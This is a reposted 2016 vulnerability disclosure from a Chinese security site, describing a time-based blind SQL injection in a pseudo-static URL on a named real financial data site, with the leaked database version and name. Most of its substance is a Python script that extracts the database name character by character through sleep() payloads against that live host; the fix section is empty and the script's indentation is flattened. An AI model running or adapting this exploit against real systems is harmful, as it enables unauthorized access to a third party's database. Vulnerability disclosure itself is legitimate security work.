神刀安全网

漏洞标题: 同花顺某站伪静态SQL注入(附验证脚本)

漏洞详情

披露状态:

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

。。。

详细说明:

注入点 http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1*

注入参数 打星号的位置

过滤了空格用+号代替,注意缓存。

True

漏洞标题:  同花顺某站伪静态SQL注入(附验证脚本)

False

漏洞标题:  同花顺某站伪静态SQL注入(附验证脚本)

漏洞证明:

版本 5.5.27

漏洞标题:  同花顺某站伪静态SQL注入(附验证脚本)

数据库 datacenfer

漏洞标题:  同花顺某站伪静态SQL注入(附验证脚本)

code 区域
#!/usr/bin/env python
#-*-coding:utf-8-*-


import string
import requests
import time


payloads = string.ascii_lowercase + string.digits + '_@. '
res = ''
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36'}

for i in range(1, 20):
for p in payloads:
start_time = time.time()
url = "http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1'+if((now()=sysdate())-(mid(database(),{},1)='{}'),1,sleep(1*3))+'1".format(i, p)
req = requests.get(url)
print req.url
if time.time() - start_time > 3:
res = res + p
print "/n" + res + "/n"
break
print "/n/n[Finish]: " + res

修复方案:

。。。

版权声明:转载请注明来源 null_z@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 同花顺某站伪静态SQL注入(附验证脚本)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮